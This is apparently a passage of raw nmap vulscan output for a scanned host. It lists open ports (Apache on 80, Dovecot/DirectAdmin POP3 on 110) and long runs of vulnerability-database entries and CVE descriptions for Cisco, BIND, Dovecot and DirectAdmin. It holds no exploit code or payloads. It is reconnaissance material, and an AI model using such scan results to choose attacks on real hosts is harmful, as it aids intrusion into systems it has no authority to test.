10870| [97450] Cisco ASR 903 and ASR 920 Series CVE-2017-6603 Denial of Service Vulnerability
10871| [93415] Cisco Nexus 9000 Series Switches CVE-2016-1455 Remote Information Disclosure Vulnerability
10872| [82579] Cisco Nexus 9000 Series ACI Mode Switches CVE-2015-6398 Denial of Service Vulnerability
10873| [77686] Cisco Firepower 9000 Series CVE-2015-6380 Unspecified OS Command Injection Vulnerability
10874| [77635] Cisco Firepower 9000 Series CVE-2015-6371 Multiple Arbitrary File Read Vulnerabilities
10875| [77634] Cisco Firepower 9000 Series CVE-2015-6370 Local Command Injection Vulnerability
10876| [77633] Cisco Firepower 9000 Series Switches CVE-2015-6372 HTML Injection Vulnerability
10877| [77631] Cisco Firepower 9000 Series Switches CVE-2015-6374 Clickjacking Vulnerability
10878| [77629] Cisco Firepower 9000 Series CVE-2015-6369 Local Denial of Service Vulnerability
10879| [77628] Cisco Firepower 9000 CVE-2015-6373 Cross Site Request Forgery Vulnerability
10880| [77614] Cisco Firepower 9000 Series Switches CVE-2015-6368 Information Disclosure Vulnerability
10881| [76913] Cisco NX-OS Software for Nexus 9000 Series Switches CVE-2015-6308 Denial of Service Vulnerability
10882| [76791] Cisco ASR 9000 Series Aggregation Services Routers CVE-2015-6301 Denial of Service Vulnerability
10883| [76762] Cisco NX-OS Software for Nexus 9000 Series CVE-2015-6295 Denial of Service Vulnerability
10884| [76329] Cisco Nexus 9000 Series Software CVE-2015-4301 Remote Denial of Service Vulnerability
10885| [76057] Cisco Firepower 9000 Series Devices CVE-2015-4287 Information Disclosure Vulnerability
10886| [75471] Cisco Unified IP Phones 9900 Series CVE-2015-4226 Denial of Service Vulnerability
10887| [75378] Cisco NX-OS Software for Nexus 9000 Series CVE-2015-4213 Information Disclosure Vulnerability
10888| [74029] Cisco ASR 9000 Series Routers CVE-2015-0694 Remote Security Bypass Vulnerability
10889| [73895] Cisco NX-OS Software for Nexus 9000 Series CVE-2015-0686 Denial of Service Vulnerability
10890| [73470] Cisco ASR 9000 Series Routers CVE-2015-0685 Denial of Service Vulnerability
10891| [73318] Cisco ASR 9000 Series Aggregation Services Routers CVE-2015-0672 Denial of Service Vulnerability
10892| [72485] Cisco Unified IP Phones 9900 Series CVE-2015-0604 Arbitrary File Upload Vulnerability
10893| [72484] Cisco Unified IP Phones 9900 Series CVE-2015-0603 Local Denial of Service Vulnerability
10894| [72483] Cisco Unified IP Phones 9900 Series CVE-2015-0601 Local Denial of Service Vulnerability
10895| [72482] Cisco Unified IP Phones 9900 Series CVE-2015-0602 Information Disclosure Vulnerability
10896| [72481] Cisco Unified IP Phones 9900 Series CVE-2015-0600 Denial of Service Vulnerability
10897| [71979] Cisco MDS 9000 NX-OS Software CVE-2015-0582 Denial of Service Vulnerability
10898| [70744] Cisco ASR 901 Series Routers CVE-2014-3293 Denial of Service Vulnerability
10899| [70658] ZTE ZXDSL 931VII 'manager_dev_config_t.gch' Information Disclosure Vulnerability
10900| [69057] Cisco Nexus 9000 Series Switches CVE-2014-3330 Access List Security Bypass Vulnerability
10901| [64770] Cisco Unified IP Phones 9900 Series Crafted Header Unregister Denial of Service Vulnerability
10902| [63564] Cisco MDS 9000 NX-OS Software VRRP Frames Denial of Service Vulnerability
10903| [62944] Cisco Unified IP Phones 9900 Series CVE-2013-5532 Buffer Overflow Vulnerability
10904| [62943] Cisco Unified IP Phones 9900 Series CVE-2013-5533 Local Command Injection Vulnerability
10905| [62905] Cisco Unified IP Phones 9900 Series CVE-2013-5526 Denial of Service Vulnerability
10906| [61330] Cisco Unified IP Phones 9900 Series CVE-2013-3426 Arbitrary File Download Vulnerability
10907| [49633] Oracle Application Server 9i 'httpd.conf' Information Disclosure Vulnerability
10908| [48811] Cisco ASR 9000 Series Routers IP Version 4 Denial of Service Vulnerability
10909| [48264] Aastra 9480i CT Multiple Information Disclosure Vulnerabilities
10910| [15542] NetObjects Fusion 9 Information Disclosure Vulnerability
10911| [6556] Oracle 9i Application Server Sample Scripts Information Disclosure Vulnerability
10912| [6459] Oracle 9i Application Server Java Server Page Source Code Disclosure Vulnerability
10913| [5335] Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
10914| [4290] Oracle 9i Default Configuration File Information Disclosure Vulnerability
10915| [4034] Oracle 9IAS OracleJSP Information Disclosure Vulnerability
10916| [3848] Mandrake Bind 9 Package Insecure File Permissions Vulnerability
10917| [2516] Microsoft Plus! 98 Windows ME Password Disclosure Vulnerability
10918|
10919| IBM X-Force - https://exchange.xforce.ibmcloud.com:
10920| [85799] Cisco Unified IP Phones 9900 Series directory traversal
10921| [75412] Cisco Unified IP Phones 9900 series RT privilege escalation
10922| [68733] Cisco 9000 Series Aggregation Service Router IPv4 packet denial of service
10923| [9704] Multiple Lucent router UDP port 9 could disclose sensitive information
10924| [9250] BIND 9 dns_message_findtype() denial of service
10925| [1852] BIND prior to 4.9.7 buffer overflow affects Digital Firewall 97 users
10926| [539] Microsoft Windows 95 and Internet Explorer password disclosure
10927| [86004] ISC BIND RDATA denial of service
10928| [84767] ISC BIND denial of service
10929| [83066] ISC BIND denial of service
10930| [81504] ISC BIND AAAA denial of service
10931| [80510] ISC BIND DNS64 denial of service
10932| [79121] ISC BIND queries denial of service
10933| [78479] ISC BIND RDATA denial of service
10934| [77185] ISC BIND TCP queries denial of service
10935| [77184] ISC BIND bad cache denial of service
10936| [76034] ISC BIND rdata denial of service
10937| [73053] ISC BIND cache update policy security bypass
10938| [71332] ISC BIND recursive queries denial of service
10939| [68375] ISC BIND UPDATE denial of service
10940| [68374] ISC BIND Response Policy Zones denial of service
10941| [67665] ISC BIND RRSIG Rrsets denial of service
10942| [67297] ISC BIND RRSIG denial of service
10943| [65554] ISC BIND IXFR transfer denial of service
10944| [63602] ISC BIND allow-query security bypass
10945| [63596] ISC BIND zone data security bypass
10946| [63595] ISC BIND RRSIG denial of service
10947| [62072] ISC BIND DNSSEC query denial of service
10948| [62071] ISC BIND ACL security bypass
10949| [61871] ISC BIND anchors denial of service
10950| [60421] ISC BIND RRSIG denial of service
10951| [56049] ISC BIND out-of-bailiwick weak security
10952| [55937] ISC Bind unspecified cache poisoning
10953| [55753] ISC BIND DNSSEC NSEC/NSEC3 cache poisoning
10954| [54416] ISC BIND DNSSEC cache poisoning
10955| [52073] ISC BIND dns_db_findrdataset() denial of service
10956| [47409] Multiple Mozilla products XBL loadBindingDocument information disclosure
10957| [45234] ISC BIND UDP denial of service
10958| [39670] ISC BIND inet_network buffer overflow
10959| [37233] libgssapi ISC BIND Novell SUSE Linux Enterprise Server GSS-TSIG request denial of service
10960| [37128] RHSA update for ISC BIND RRset denial of service not installed
10961| [37127] RHSA update for ISC BIND named service denial of service not installed
10962| [36275] ISC BIND DNS query spoofing
10963| [35575] ISC BIND query ID cache poisoning
10964| [35571] ISC BIND ACL security bypass
10965| [31838] ISC BIND RRset denial of service
10966| [31799] ISC BIND named service denial of service
10967| [29876] HP Tru64 ypbind core dump information disclosure
10968| [28745] ISC BIND DNSSEC RRset denial of service
10969| [28744] ISC BIND recursive INSIST denial of service
10970| [22041] BEA WebLogic Server and Express LDAP anonymous bind information disclosure
10971| [18836] BIND hostname disclosure
10972| [10624] ISC BIND DNS stub resolver library (libresolv.a) stack buffer overflows
10973| [10333] ISC BIND SIG null pointer dereference denial of service
10974| [10332] ISC BIND OPT resource record (RR) denial of service
10975| [10304] ISC BIND SIG cached resource records (RR) heap buffer overflow
10976| [7027] Cisco CBOS Web-based configuration utility binds to port 80 by default
10977| [5814] ISC BIND "
10978| [5540] ISC BIND can be remotely crashed by issuing ZXFR requests
10979| [5462] ISC BIND AXFR host command remote buffer overflow
10980|
10981| Exploit-DB - https://www.exploit-db.com:
10982| [24689] cPanel 9.9.1 -R3 Front Page Extension Installation Information Disclosure
10983| [23059] Netbula Anyboard 9.9.5 6 Information Disclosure Vulnerability
10984| [9300] ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC
10985|
10986| OpenVAS (Nessus) - http://www.openvas.org:
10987| [103090] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability
10988| [103031] ISC BIND 9 < 9.7.2-P2 Multiple Vulnerabilities
10989| [103030] ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
10990| [100717] ISC BIND 9 'RRSIG' Record Type Remote Denial of Service Vulnerability
10991| [100458] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability
10992| [100362] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
10993| [100251] ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability
10994| [63208] Fedora Core 9 FEDORA-2009-0350 (bind)
10995| [11226] Oracle 9iAS default error information disclosure
10996|
10997| SecurityTracker - https://www.securitytracker.com:
10998| [1025811] Cisco ASR 9000 Series Router IPv4 Packet Processing Flaw Lets Remote Users Deny Service
10999| [1012995] BIND 9 Validator Assumption Error May Let Remote Users Deny Service
11000| [1005048] Oracle Enterprise Manager Web Service Component of Oracle 9i Application Server Discloses the Web Cache Administrator Password to Local Users
11001| [1003675] Oracle 9iAS Application Server Discloses CGI-BIN Script Source Code to Remote Users
11002| [1001186] Microsoft Windows Me Operating System and Windows 98 with the Plus! 98 Package Disclose Data Compression Passwords
11003| [1028901] (McAfee Issues Advisory for McAfee Email Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11004| [1028900] (McAfee Issues Advisory for McAfee Email and Web Security Appliance) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11005| [1028899] (McAfee Issues Fix for McAfee Web Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11006| [1028866] (McAfee Issues Fix for McAfee Firewall Enterprise) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11007| [1028854] (NetBSD Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11008| [1028849] (Red Hat Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11009| [1028848] (Red Hat Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11010| [1028839] (FreeBSD Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11011| [1028838] ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11012| [1028632] ISC BIND RUNTIME_CHECK Error Lets Remote Users Deny Service Against Recursive Resolvers
11013| [1028046] ISC BIND DNS64 and Response Policy Zones (RPZ) Bug Lets Remote Users Deny Service
11014| [1027835] ISC BIND DNS64 Bug Lets Remote Users Deny Service
11015| [1027642] ISC BIND RDATA Processing Flaw Lets Remote Users Deny Service
11016| [1027529] ISC BIND RDATA Processing Flaw Lets Remote Users Deny Service
11017| [1026647] ISC BIND Cache Update Policy Can Be Bypassed to Allow Revoked Domain Names to Remain Resolvable
11018| [1026335] ISC BIND Invalid Record Caching Flaw Lets Remote Users Deny Service
11019| [1025743] ISC BIND Response Policy Zones DNAME/CNAME Processing Flaw Lets Remote Users Deny Service
11020| [1025742] ISC BIND Packet Processing Flaw Lets Remote Users Deny Service
11021| [1015850] Samba winbindd Daemon Discloses Server Password to Local Users
11022| [1003359] BindView NETinventory Discloses Password to Local Users During Auditing
11023| [1001721] BIND Domain Name System Software May Disclose DNS Transactional Signature (TSIG) Keys to Local Users
11024|
11025| OSVDB - http://www.osvdb.org:
11026| [86219] Cardiac Science G3 Plus 9390A-501 AED AEDUpdate Cleartext Password Local Disclosure
11027| [22517] MPN HP-180W Wireless IP Phone UDP Port 9090 Information Disclosure
11028| [22516] ZyXEL P-2000W_v2 VoIP Wi-Fi Phone UDP Port 9090 Information Disclosure
11029| [21292] ZyXEL P2000W UDP 9090 Remote Information Disclosure
11030|_
80/tcp open ssl/http syn-ack Apache/2
11032|_http-server-header: Apache/2
11033|_http-trane-info: Problem with XML parsing of /evox/about
110/tcp open pop3 syn-ack Dovecot DirectAdmin pop3d
11035| vulscan: VulDB - https://vuldb.com:
11036| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
11037| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
11038| [134243] InfinitumIT DirectAdmin up to 1.561 FileManager CSRF privilege escalation
11039| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
11040| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
11041| [131477] JBMC DirectAdmin 1.55 /CMD_ACCOUNT_ADMIN cross site request forgery
11042| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
11043| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
11044| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
11045| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
11046| [112266] JBMC DirectAdmin up to 1.51 email_ftp_password_change Setting memory corruption
11047| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
11048| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
11049| [95172] Directadmin Controlpanel 1.50.1 /CMD_SELECT_USERS cross site scripting
11050| [95100] DirectAdmin up to 1.50.1 Crash denial of service
11051| [69835] Dovecot 2.2.0/2.2.1 denial of service
11052| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
11053| [65684] Dovecot up to 2.2.6 unknown vulnerability
11054| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
11055| [63692] Dovecot up to 2.0.15 spoofing
11056| [7062] Dovecot 2.1.10 mail-search.c denial of service
11057| [62578] DirectAdmin 1.403 cross site scripting
11058| [61198] Jbmc-software DirectAdmin 1.403 cross site scripting
11059| [57517] Dovecot up to 2.0.12 Login directory traversal
11060| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
11061| [57515] Dovecot up to 2.0.12 Crash denial of service
11062| [54944] Dovecot up to 1.2.14 denial of service
11063| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
11064| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
11065| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
11066| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
11067| [53277] Dovecot up to 1.2.10 denial of service
11068| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
11069| [48756] Jbmc-software DirectAdmin up to 1.292 cross site scripting
11070| [48060] Jbmc-software DirectAdmin up to 1.17 privilege escalation
11071| [45256] Dovecot up to 1.1.5 directory traversal
11072| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
11073| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
11074| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
11075| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
11076| [40356] Dovecot 1.0.9 Cache unknown vulnerability
11077| [38747] DirectAdmin 1.30.2 cross site scripting
11078| [38222] Dovecot 1.0.2 directory traversal
11079| [37578] DirectAdmin 1.30.1 cross site scripting
11080| [36376] Dovecot up to 1.0.x directory traversal
11081| [36066] JBMC Software DirectAdmin 1.293 cross site scripting
11082| [35680] Jbmc Software DirectAdmin 1.293 cross site scripting
11083| [33341] JBMC Software DirectAdmin 1.28.1 cross site scripting
11084| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
11085| [30268] Timo Sirainen Dovecot 1.0/1.0 Beta2/1.0 Beta3/1.0 Beta7 directory traversal
11086| [30021] Jbmc Software DirectAdmin 1.26.6 cross site scripting
11087|
| MITRE CVE - https://cve.mitre.org:
| [CVE-2012-5305] Cross-site scripting (XSS) vulnerability in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
| [CVE-2012-3842] Multiple cross-site scripting (XSS) vulnerabilities in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via the (1) select0 or (2) select8 parameters.
| [CVE-2011-5033] Stack-based buffer overflow in CFS.c in ConfigServer Security & Firewall (CSF) before 5.43, when running on a DirectAdmin server, allows local users to cause a denial of service (crash) via a long string in an admin.list file.
| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
| [CVE-2009-2216] Cross-site scripting (XSS) vulnerability in CMD_REDIRECT in DirectAdmin 1.33.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the URI in a view=advanced request.
| [CVE-2009-1526] JBMC Software DirectAdmin before 1.334 allows local users to create or overwrite any file via a symlink attack on an arbitrary file in a certain temporary directory, related to a request for this temporary file in the PATH_INFO to the CMD_DB script during a backup action.
| [CVE-2009-1525] CMD_DB in JBMC Software DirectAdmin before 1.334 allows remote authenticated users to gain privileges via shell metacharacters in the name parameter during a restore action.
| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
| [CVE-2007-4830] Cross-site scripting (XSS) vulnerability in CMD_BANDWIDTH_BREAKDOWN in DirectAdmin 1.30.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the user parameter.
| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
| [CVE-2007-3501] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin 1.30.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vector than CVE-2007-1508.
| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
| [CVE-2007-1926] Cross-site scripting (XSS) vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via (1) http or (2) ftp requests logged in /var/log/directadmin/security.log
| [CVE-2007-1508] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin allows remote attackers to inject arbitrary web script or HTML via the RESULT parameter, a different vector than CVE-2006-5983.
| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
| [CVE-2006-5983] Multiple cross-site scripting (XSS) vulnerabilities in JBMC Software DirectAdmin 1.28.1 allow remote authenticated users to inject arbitrary web script or HTML via the (1) user parameter to (a) CMD_SHOW_RESELLER or (b) CMD_SHOW_USER in the Admin level
| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
| [CVE-2006-2153] Cross-site scripting (XSS) vulnerability in HTM_PASSWD in DirectAdmin Hosting Management allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
|
| SecurityFocus - https://www.securityfocus.com/bid/:
| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
| [83952] DirectAdmin CVE-2006-2153 Cross-Site Scripting Vulnerability
| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
| [67306] Dovecot Denial of Service Vulnerability
| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
| [63911] Installatron Plugin for DirectAdmin Insecure Temporary File Creation Vulnerability
| [63373] Installatron Plugin for DirectAdmin cURL Output Remote Privilege Escalation Vulnerability
| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
| [62929] DirectAdmin Backup Multiple Security Vulnerabilities
| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
| [61017] DirectAdmin Symlink Attack Multiple Remote Privilege Escalation Vulnerabilities
| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
| [53281] DirectAdmin Multiple Cross Site Scripting Vulnerabilities
| [52848] RETIRED: DirectAdmin 'CMD_DOMAIN' Cross-Site Scripting Vulnerability
| [52845] JBMC Software DirectAdmin 'domain' Parameter Cross Site Scripting Vulnerability
| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
| [47693] DirectAdmin 'mysql_backup' Folder Permissions Information Disclosure Vulnerability
| [47690] DirectAdmin Hard Link Local Privilege Escalation Vulnerability
| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
| [39838] tpop3d Remote Denial of Service Vulnerability
| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
| [38721] DirectAdmin 'CMD_DB_VIEW' Cross-Site Scripting Vulnerability
| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
| [35450] DirectAdmin 'CMD_REDIRECT' Cross-Site Scripting Vulnerability
| [34678] DirectAdmin '/CMD_DB' Restore Action Local Privilege Escalation Vulnerability
| [34676] DirectAdmin '/CMD_DB' Backup Action Insecure Temporary File Creation Vulnerability
| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
| [25607] DirectAdmin CMD_BANDWIDTH_BREAKDOWN Cross-Site Scripting Vulnerability
